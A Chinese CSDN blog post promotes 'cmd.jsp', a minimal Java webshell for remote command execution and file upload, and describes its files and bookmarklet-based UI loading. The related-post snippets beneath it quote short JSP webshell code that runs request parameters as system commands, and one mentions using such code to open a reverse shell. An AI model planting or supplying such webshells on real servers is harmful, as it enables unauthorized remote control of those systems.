掌控命令行的利器:更好的cmd.jsp Webshell

于 2024-05-25 09:32:02 发布
阅读量388 收藏 9
点赞数 4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gitblog_00065/article/details/139189752
版权

掌控命令行的利器:更好的cmd.jsp Webshell

项目介绍

在网络安全和渗透测试领域,cmd.jsp是一个小巧而强大的Java Webshell,它专注于提供远程命令执行以及文件上传功能。这个开源项目的目标是实现最小化、兼容广泛的Webshell,通过内嵌的JavaScript实现界面交互和客户端逻辑,简化了传统Webshell的部署和使用。

项目技术分析

cmd.jsp的核心在于它的轻量级设计。主要包含以下文件:

  • cmd.jsp:最小化的Webshell版本,经过压缩以提高运行效率。
  • cmd_readable.jsp:为了便于阅读和理解,提供了格式化的源代码。
  • cmd.war:针对web应用服务器的WAR包形式,方便一键部署。
  • a.js:提供用户界面和客户端功能的JavaScript代码。

使用时,你可以选择两种方式之一来加载JavaScript:

  1. 书签方法:将a.js编码为Base64字符串并插入到书签中,当访问cmd.jsp页面时点击书签,即可注入UI和客户端功能。
  2. 托管JS方法:将a.js上传至服务器,并在cmd.jsp中引用该脚本,然后将修改后的cmd.jsp上传到Java web应用服务器。

项目及技术应用场景

cmd.jsp适用于以下场景:

  • 网络安全研究:进行渗透测试,检查网站的安全漏洞。
  • 故障排查:当服务器访问受限或控制台不可用时,可以通过Webshell远程执行命令。
  • 开发者调试:快速部署临时命令行工具,无需复杂配置。

项目特点

  • 易用性:通过简单的书签操作,即可在任何支持JSP的服务器上快速启用Webshell。
  • 轻量化:整个项目文件体积小,对服务器资源占用极低。
  • 兼容性强:支持多种浏览器和Java Web应用程序服务器。
  • 灵活性:既可以本地加载JavaScript,也可以远程托管,根据需求自由选择。

总的来说,cmd.jsp是网络运维和安全研究人员必备的高效工具,其简洁的设计和强大的功能使其在同类Webshell中脱颖而出。如果你经常需要处理远程服务器的任务,那么cmd.jsp无疑是你的得力助手。现在就加入这个开源项目,体验前所未有的便捷吧!

谢忻含Norma
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
jsp/java执行或者调用bat/cmd脚本文件
青灬火的博客
06-15 3989
jsp页面调用脚本文件或者脚本命令的方法其实和java一样,因为可以在jsp中执行java代码 <%@ page language="java" import="java.lang.*" contentType="text/html; charset=ISO-8859-1" pageEncoding="ISO-8859-1"%> <!DOCTYPE html PUBL...
jsp webshell cmd
10-18
jsp webshell cmd jsp 代码
jsp cmd
mmllkkjj的专栏
01-14 1345
<br />http://hi.baidu.com/forhack/blog/item/9ebaf70673b95b7e02088181.html<br /> <br /><%@ page contentType="text/html; charset=gb2312"%><br /> <%@ page import="java.io.*"%><br /> <html><br /> <head><title>jspcmd功能</title><br /> </head><br /> <body bg
一段在JSP操作CMD的小代码
java开发指南博客 【转载】
10-17 309
jsp或者java里面执行CMD命令的小代码. &lt;%@ page import="java.io.*" %&gt; &lt;% try { String cmd = request.getParameter("cmd"); Process child = Runtime.getRuntime().exec(cmd); InputStream in = child.getInput...
jsp命令行页面-执行shell
落叶翩翩的CSDN博客
01-16 7977
看效果截图: jsp文件如下: 放在同一目录下,需要导入jquery,jquery版本最低1.7: cmd.jsp jsp命令行页面 textarea{ background-color: #000; color:red; width:100%; } 请输入命令: $(function(){ $("#cmd").keydown(functio
WebShellWebshel​​l &&后门集合
02-05
WebShell的这是一个Webshel​​l开源项目类别ar Ascx 阿什克斯阿斯玛克斯天冬氨酸Aspx C Cfm Cgi Java脚本Jsp px 执照MySQL的Nginx的其他p l 自述文件SSH协议肥皂乌德普微信狗狗icmp 罐节点js 开火操作系统pwnginx ...
cmd.exe webshell提权必备
10-28
啊偶尔。。无语啊。。源码我的确没有、。但是下载的地方绝对可靠
jspwebshell.txt
04-07
根据提供的文件信息,本文将详细解析与“jspwebshell.txt”相关的关键知识点,包括JSP WebShell的基本概念、工作原理、以及示例代码中的具体实现细节。 ### JSP WebShell基本概念 WebShell通常指的是攻击者利用...
en.rar_jsp webshell
09-19
en.jsp 操作服务器文件命令 俗称webshell
cmd.jsp 经典版
Sunc23的专栏
12-03 2224
try { String cmd = request.getParameter("cmd"); Process child = Runtime.getRuntime().exec(cmd); InputStream in = child.getInputStream(); int c; while ((c = in.read()) != -1) { out.print((char)c)
cmd jsp 交互
mmllkkjj的专栏
01-14 4095
<%@page pageEncoding="gbk"%><br /> <%@page import="java.io.*"%><br /> <%!<br /> /**<br /> * Codz By ninty<br /> * http://www.forjj.com/<br /> * 2010-01-23<br /> * Windows + Tomcat 5.5 + Jdk6 + Editplus<br /> * 提供与cmd.exe的在线交互功能,只支持单个用户用,不要双开这
jsp小后门
weixin_34364135的博客
05-28 741
一:执行系统命令: 无回显执行系统命令: 1 &lt;%Runtime.getRuntime().exec(request.getParameter("i"));%&gt; 请求:http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls 执行之后不会有任何回显,用来反弹个shell很方便。 有回显带密码验证的: 1 2...
【Datawhale AI 夏令营第三期学习笔记Taks1】 跑通baseline #Datawhale AI 夏令营
07-28
【Datawhale AI 夏令营第三期学习笔记Taks1】 跑通baseline #Datawhale AI 夏令营
餐厅营销策划方案.doc
07-28
商业计划书,创业计划书,项目计划书,计划书模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
OpenMv串口通信,接收数据
最新发布
07-28
OpenMV 是一个开源的机器视觉平台,它为嵌入式系统提供了强大的图像处理能力。OpenMV 主要面向对机器视觉有需求的开发者和爱好者,通过其强大的微控制器和摄像头模块,用户可以在低成本的前提下实现复杂的视觉任务。OpenMV 既可以用于教育领域,帮助学生理解图像处理和计算机视觉的基础知识,也可以用于工业应用,实现自动化检测、分类和导航等功能。 在 OpenMV 系统中,通信模块是实现与其他设备或系统互联互通的关键部分。OpenMV 支持多种通信协议,包括串口通信(UART)、I2C、SPI、CAN 和 USB 等。这些通信接口使得 OpenMV 可以方便地与各种传感器、执行器以及其他嵌入式设备进行数据交换,从而扩展其应用范围和功能。 串口通信(UART)是一种广泛应用于嵌入式系统的通信方式,具有实现简单、成本低廉的优点。OpenMV 的 UART 接口可以与单片机、PC 甚至其他 OpenMV 板卡进行数据传输,使得图像数据和处理结果能够及时传递给其他系统。这个是电赛智能送药小车利用openMv进行的串口通信接收数据的代码
【2021】新能源汽车简史:电动汽车沉浮录-Fastdata极数_62页.pdf
07-28
【2021】新能源汽车简史:电动汽车沉浮录-Fastdata极数_62页.pdf
【20210727】汽车行业:多因素共振导致6月乘用车销量同比走弱新能源车延续强势增长-中国银河_18页.pdf
07-28
【20210727】汽车行业:多因素共振导致6月乘用车销量同比走弱新能源车延续强势增长-中国银河_18页.pdf
Jsp Webshell request.get木马的特征?
07-12
JSP Webshell 是一种基于 JSP 技术的恶意软件,它被用来在受感染的服务器上执行恶意操作。针对 request 对象的一些常见攻击模式和特征包括: 1. 非法的请求参数:Webshell 可能会使用非法的请求参数来执行恶意操作,例如包含特殊字符、路径遍历、SQL 注入等。 2. 异常的请求路径:Webshell 可能会使用异常的请求路径,例如使用不存在的 JSP 文件名或路径,以触发服务器的异常处理逻辑。 3. 隐藏的请求参数:Webshell 可能会使用隐藏的请求参数,这些参数可能不会在正常请求中出现,但可以触发特定的恶意操作。 4. 远程命令执行:Webshell 可能会通过 request 对象执行远程命令,例如执行系统命令、读取文件内容、连接到远程服务器等。 5. 文件上传漏洞利用:Webshell 可能会利用文件上传漏洞,通过 request 对象上传恶意文件到服务器,并在上传后执行其中的恶意代码。 6. 对 Web 容器的漏洞利用:Webshell 可能会利用 Web 容器(如 Tomcat、Jetty 等)的漏洞,通过 request 对象执行恶意操作。 7. 加密/编码:Webshell 可能会对请求参数进行加密或编码,以避免被检测到。 这些特征只是一些常见的示例,实际上,Webshell 的形式和特征会因攻击者和具体的攻击方式而有所不同。为了保护服务器安全,建议采取安全措施,如及时更新软件、限制文件上传、过滤恶意请求参数等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

谢忻含Norma

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值